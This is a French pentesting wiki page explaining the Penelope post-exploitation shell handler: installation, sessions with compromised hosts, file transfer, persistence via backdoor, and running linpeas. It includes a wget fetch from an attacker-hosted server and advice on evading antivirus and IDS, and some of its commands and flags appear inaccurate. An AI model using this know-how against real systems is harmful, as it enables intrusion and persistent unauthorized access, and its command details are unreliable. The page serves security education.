Road To Hacker
  • ACCUEIL
  • OUTILS
    • OUTILS LOCAUX
      • Acunetix
      • Aircrack-ng
      • Apktool
      • Braa
      • Burp Suite
      • Cewl
      • Crunch
      • Cupp
      • cURL
      • Dig
      • Dirb
      • Empire
      • Enum4linux
      • Evil-WinRM
      • Feroxbuster
      • Gobuster
      • Hashcat
      • Hydra
      • John The Ripper
      • Metasploit & Msfvenom
      • Mimikatz
      • Netcat
      • NetExec
        • Modules
      • Nikto
      • Nmap
      • Nuclei
      • Onesixtyone
      • OpenVAS
      • Penelope
      • Pwncat
      • Recon-ng
      • Responder
      • Semgrep
      • Smbmap
      • Snmpwalk
      • Sqlmap
      • Sublist3r
      • Tcpdump
      • The Harvester
      • Wfuzz
      • Wapiti
      • Zap
    • OUTILS EN LIGNE
      • Hacktools
      • Hash Cracking
      • Encodage et Conversion
      • Stéganographie
      • Shells et Reverse Shells
      • GTFOBins
      • LOLBAS
  • SERVICES ET PROTOCOLES
    • DATABASE
      • MongoDB
      • MSSQL
      • MySQL
      • Oracle TNS
      • SQLite3
    • FTP
    • IMAP/POP3
    • IPMI
    • NFS
    • RSYNC
    • SNMP
    • SMTP
    • SMB
      • Rpcclient
      • Smbclient
    • SSH
  • ENUMERATION SYSTEMES
    • Enumération Linux
    • Enumération Windows
  • TIPS
    • Commandes de base Linux
    • Commandes de base Windows
    • Shell Stable et Reverse Shell
    • xfreerdp / rdesktop
  • INFORMATIONS LEGALES
    • Mentions légales
    • Politique de confidentialité
Propulsé par GitBook
Sur cette page
  • Penelope - Gestion Avancée de Shells pour la Post-Exploitation
  • Introduction
  • 🚀 Étape 1 : Installation de Penelope
  • 🛠️ Étape 2 : Utilisation de Base
  • 🔍 Étape 3 : Fonctionnalités Avancées
  • 📋 Scénarios d’Utilisation
  • 📖 Bonnes Pratiques
  • Conclusion
  1. OUTILS
  2. OUTILS LOCAUX

Penelope

Penelope - Gestion Avancée de Shells pour la Post-Exploitation

⚠️ Avertissement : Ce contenu est strictement destiné à un usage éducatif et éthique dans le domaine de la cybersécurité. Toute utilisation illégale ou malveillante est interdite et engage la seule responsabilité de l’utilisateur.

Introduction

Penelope est un outil polyvalent conçu pour la gestion avancée de shells interactifs dans un environnement de post-exploitation. Il permet aux pentesters et chercheurs en sécurité de maintenir des connexions fiables avec des cibles compromises, d'exécuter des commandes ou scripts à distance, et de gérer plusieurs sessions simultanées.

Grâce à ses fonctionnalités telles que l'auto-upgrade en shell PTY, la gestion de la persistance et un serveur HTTP intégré, Penelope simplifie considérablement les étapes critiques de la post-exploitation.

🚀 Étape 1 : Installation de Penelope

Pré-requis

  1. Python 3.6 ou version ultérieure :

    • Vérifiez votre version de Python :

      python3 --version

  2. Cloner le dépôt GitHub de Penelope :

    • Téléchargez Penelope depuis son dépôt officiel :

      git clone https://github.com/penelope/penelope.git

  3. Naviguer dans le répertoire Penelope :

    cd penelope

  4. Installer les dépendances :

    • Utilisez pip pour installer les modules nécessaires :

      pip install -r requirements.txt

🛠️ Étape 2 : Utilisation de Base

1. Établir une Connexion avec une Cible

Pour établir une connexion avec une cible compromise, utilisez la commande suivante :

python3 penelope.py -t <target_ip> -p <target_port>

  • Explication :

    • -t : Spécifie l'adresse IP de la cible.

    • -p : Indique le port sur lequel se connecter (par défaut, 22 pour SSH ou 4444 pour un reverse shell).

2. Téléchargement et Upload de Fichiers

a) Télécharger un fichier depuis la machine cible

download /path/to/remote/file /path/to/local/destination

  • Explication :

    • Télécharge un fichier spécifique depuis la cible vers votre machine.

b) Uploader un fichier vers la cible

upload /path/to/local/file /path/to/remote/destination

  • Explication :

    • Envoie un fichier local (par exemple, un script de post-exploitation) vers la cible.

3. Maintenir des Sessions Multiples

Penelope permet de maintenir plusieurs sessions actives avec une cible. Si une session est perdue, elle est automatiquement recréée.

python3 penelope.py --maintain 2

  • Explication :

    • --maintain : Spécifie le nombre de sessions à maintenir (2 dans cet exemple).

4. Auto-Upgrade en Shell PTY

Dès qu'une connexion est établie, Penelope tente d'upgrader automatiquement un shell simple en PTY (Pseudo-Terminal) pour permettre des commandes interactives comme nano ou top.

Si l’upgrade n’est pas automatique, utilisez la commande :

upgrade

  • Explication :

    • Convertit le shell actuel en un terminal interactif.

🔍 Étape 3 : Fonctionnalités Avancées

1. Ajouter de la Persistance

Penelope peut maintenir l'accès à une machine compromise même après un redémarrage ou une interruption de session.

Commande :

persist

  • Explication :

    • Configure un mécanisme de persistance, comme l'ajout d'un backdoor.

2. Utiliser le Serveur HTTP Intégré

Penelope inclut un serveur HTTP intégré pour partager facilement des fichiers entre votre machine et la cible.

Démarrer le serveur HTTP :

python3 penelope.py -s --port 8000

  • Explication :

    • -s : Active le serveur HTTP.

    • --port : Spécifie le port du serveur (8000 dans cet exemple).

3. Exécuter des Scripts Locaux sur la Cible

Penelope permet d'uploader et d'exécuter des scripts locaux directement sur la machine cible.

Commande :

run /path/to/script.sh

  • Explication :

    • Exécute le script spécifié et affiche les résultats dans la session en cours.

📋 Scénarios d’Utilisation

Exemple 1 : Maintenir un Accès Constant à une Machine

Si vous souhaitez maintenir deux sessions actives avec une machine cible pour éviter toute perte d'accès, utilisez la commande suivante :

python3 penelope.py --maintain 2

Penelope régénérera automatiquement une nouvelle session si une des connexions est interrompue.

Exemple 2 : Exécuter des Scripts de Post-Exploitation

a) Uploader un script de post-exploitation

upload linpeas.sh /tmp

b) Exécuter le script sur la machine cible

run /tmp/linpeas.sh

  • Explication :

    • linpeas.sh est un script d’énumération populaire pour identifier des failles ou des privilèges à exploiter.

Exemple 3 : Partager des Fichiers via le Serveur HTTP Intégré

  1. Démarrer le serveur HTTP sur votre machine :

    python3 penelope.py -s --port 8080

  2. Télécharger le fichier depuis la cible : Sur la machine cible, exécutez :

    wget http://<your_ip>:8080/file_to_download

📖 Bonnes Pratiques

1. Obtenir des Autorisations Légales

  • Assurez-vous toujours d’avoir une autorisation explicite pour tester ou accéder à un système.

2. Maintenir la Discrétion

  • Évitez d’uploader ou d'exécuter des fichiers inutiles pour réduire les traces laissées.

  • Supprimez les fichiers sensibles après l'utilisation :

    rm /tmp/linpeas.sh

3. Éviter les Détections

  • Si la cible dispose d'un antivirus ou d’un IDS, modifiez vos scripts ou utilisez des versions obfusquées.

4. Planifier des Points de Reconnexion

  • Utilisez la persistance avec parcimonie pour éviter de déclencher des alertes réseau.

Conclusion

Penelope est un outil indispensable pour les pentesters cherchant à simplifier la gestion des shells et des connexions post-exploitation. Grâce à ses fonctionnalités telles que le maintien de sessions multiples, l’auto-upgrade des shells en PTY, et un serveur HTTP intégré, il facilite grandement les étapes complexes de post-exploitation. Que ce soit pour uploader des scripts, maintenir un accès persistant ou gérer des fichiers à distance, Penelope s'impose comme un choix fiable et puissant.

Liens utiles :

  • Mentions légales

  • Politique de confidentialité

  • Contactez-nous

PrécédentOpenVASSuivantPwncat

Dernière mise à jour il y a 3 mois